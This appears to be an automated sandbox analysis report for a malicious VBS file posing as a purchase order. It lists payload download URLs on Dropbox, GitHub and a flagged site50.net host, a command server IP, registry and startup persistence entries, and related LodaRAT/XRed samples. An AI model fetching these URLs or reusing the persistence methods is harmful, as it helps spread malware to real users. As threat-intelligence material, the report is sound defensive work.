                                                                              https://docs.google.com/Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3039578670.000000001E76B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3025439050.000000001E142000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://docs.google.com/aSynaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://docs.google.com/google.com/Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://xred.site50.net/syn/SSLLibrary.dlupdate.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/RNEQTT.exeuwscript.exe, 00000000.00000002.1763617544.0000022996F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://xred.site50.net/syn/SUpdate.iniupdate.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drtrue
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://drive.usercontent.google.comSynaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://drive.usercontent.google.com/nectSynaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://raw.githubusercontent.com/$wscript.exe, 00000000.00000002.1763687744.0000022996F42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762802968.0000022996F3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://docs.google.com/8.4Synaptics.exe, 00000008.00000003.2026465506.0000000000868000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://docs.google.com/8Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://docs.google.com/f4Synaptics.exe, 00000008.00000003.2026465506.0000000000868000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://docs.google.com/cting...Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://docs.google.com/5Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://docs.google.com/0Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://xred.site50.net/syn/Synaptics.rarupdate.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drtrue
                                                                                                              • Avira URL Cloud: malware
                                                                                                              		unknown
                                                                                                              https://docs.google.com/Denetleniyor...Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/mainwscript.exe, wscript.exe, 00000000.00000002.1763555478.0000022994AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1763602606.0000022996DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1763617544.0000022996EF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://raw.githubusercontent.com/;wscript.exe, 00000000.00000002.1763508004.000002299493F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761565226.000002299493A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://docs.google.com/meSynaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://raw.githubusercontent.com/wscript.exe, 00000000.00000002.1763687744.0000022996F42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762802968.0000022996F3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1763508004.000002299493F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761565226.000002299493A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://drive.usercontent.google.com/LSynaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1update.exe, 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drfalse
                                                                                                                                		high
                                                                                                                                https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drfalse
                                                                                                                                  		high
                                                                                                                                  https://docs.google.com/uc?id=0;Synaptics.exe, 00000008.00000002.3063302398.000000002B5BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3089165847.000000003B3BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3053549341.0000000025E3E000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://drive.usercontent.google.com/3Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://xred.site50.net/syn/SSLLibrary.dllupdate.exe, 00000006.00000003.1876203635.0000000000784000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drtrue
                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                      		unknown
                                                                                                                                      https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlupdate.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        		high

                                                                                                                                        World Map of Contacted IPs

                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs

                                                                                                                                        Public IPs

                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        185.199.108.133
                                                                                                                                        		raw.githubusercontent.comNetherlands
                                                                                                                                        		54113FASTLYUSfalse
                                                                                                                                        142.250.181.14
                                                                                                                                        		docs.google.comUnited States
                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                        172.111.138.100
                                                                                                                                        		unknownUnited States
                                                                                                                                        		3223VOXILITYGBtrue
                                                                                                                                        142.250.181.97
                                                                                                                                        		drive.usercontent.google.comUnited States
                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                        69.42.215.252
                                                                                                                                        		freedns.afraid.orgUnited States
                                                                                                                                        		17048AWKNET-LLCUSfalse

                                                                                                                                        General Information

                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                        Analysis ID:1580572
                                                                                                                                        Start date and time:2024-12-25 09:06:04 +01:00
                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 10m 46s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:full
                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                        Number of analysed new started processes analysed:26
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • AMSI enabled
                                                                                                                                        Analysis Mode:default
                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                        Sample name:Purchase Order No. G02873362-Docx.vbs
                                                                                                                                        Detection:MAL
                                                                                                                                        Classification:mal100.troj.adwa.expl.evad.winVBS@25/34@22/5
                                                                                                                                        EGA Information:
                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 99%
                                                                                                                                        • Number of executed functions: 92
                                                                                                                                        • Number of non-executed functions: 279
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Found application associated with file extension: .vbs

                                                                                                                                        Warnings

                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                        • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 20.189.173.10, 172.202.163.200, 20.190.177.147, 23.218.208.109, 13.107.246.63
                                                                                                                                        • Excluded domains from analysis (whitelisted): ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, s-0005.s-msedge.net, config.officeapps.live.com, onedscolprdwus09.westus.cloudapp.azure.com, azureedge-t-prod.trafficmanager.net, officeclient.microsoft.com, ecs.office.trafficmanager.net, ukw-azsc-config.officeapps.live.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                        • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                        Simulations

                                                                                                                                        Behavior and APIs

                                                                                                                                        TimeTypeDescription
                                                                                                                                        03:07:21API Interceptor963x Sleep call for process: Synaptics.exe modified
                                                                                                                                        08:07:05AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                        08:07:18Task SchedulerRun new task: VFNCBO.exe path: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                        08:07:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VFNCBO "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                                        08:07:27AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        08:07:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run VFNCBO "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                                        08:07:43AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                        08:07:51AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VFNCBO.lnk

                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                        IPs

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        185.199.108.133cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                        vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                        VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                        OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                        172.111.138.100New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                          RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                            Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                              Purchase Order Supplies.Pdf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                bf-p2b.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                  gry.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    dlawt.exeGet hashmaliciousLodaRatBrowse
                                                                                                                                                      nXi3rwhMmB.exeGet hashmaliciousLodaRatBrowse
                                                                                                                                                        69.42.215.252blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                        System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        raw.githubusercontent.comYYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 185.199.109.133
                                                                                                                                                        YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 185.199.110.133
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 185.199.110.133
                                                                                                                                                        Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.199.110.133
                                                                                                                                                        BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.199.110.133
                                                                                                                                                        Set-up!.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                        • 185.199.111.133
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                        • 185.199.110.133
                                                                                                                                                        s-part-0035.t-0009.t-msedge.netblq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        aYf5ibGObB.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        Audio02837498.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        gDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        https://www.bing.com/search?pglt=41&q=%E5%B9%B3%E6%88%9031%E5%B9%B4+%E8%A5%BF%E6%9A%A6&cvid=467cba4c80be484e858dd735013f0921&gs_lcrp=EgRlZGdlKgYIARAAGEAyBggAEEUYOTIGCAEQABhAMgYIAhAAGEAyBggDEAAYQDIGCAQQABhAMgYIBRAAGEAyBggGEAAYQDIGCAcQABhAMgYICBAAGEAyCAgJEOkHGPxV0gEINjUyMGowajGoAgCwAgE&FORM=ANNAB1&PC=U531Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        freedns.afraid.orgblq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • 69.42.215.252

                                                                                                                                                        ASNs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        VOXILITYGBNew PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • 172.111.138.100
                                                                                                                                                        RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • 172.111.138.100
                                                                                                                                                        1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                        • 104.243.246.120
                                                                                                                                                        nabsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 46.243.206.70
                                                                                                                                                        7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 37.221.166.158
                                                                                                                                                        fACYdCvub8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 5.254.60.108
                                                                                                                                                        powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                        • 37.221.160.225
                                                                                                                                                        Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • 172.111.138.100
                                                                                                                                                        1730537046a28265099d74997f6aaf573f6441587128b68a620c5fd7396901e33fe86509f2931.dat-decoded.exeGet hashmaliciousNjratBrowse
                                                                                                                                                        • 104.243.246.120
                                                                                                                                                        Purchase Order Supplies.Pdf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                        • 172.111.138.100
                                                                                                                                                        AWKNET-LLCUSblq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • 69.42.215.252
                                                                                                                                                        FASTLYUShttps://yungbucksbbq.com/portbiz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 151.101.2.137
                                                                                                                                                        http://assets.website-files.com/65efffe8d4e10d26910f0543/65f65633ab8b2f021b357c18_64146967722.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 151.101.1.140
                                                                                                                                                        https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 151.101.66.137
                                                                                                                                                        Audio02837498.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 151.101.194.137
                                                                                                                                                        cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                                                                        • 151.101.193.91
                                                                                                                                                        https://app.salesforceiq.com/r?target=631f420eed13ca3bcf77c324&t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&url=https://monaghans.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 151.101.66.137
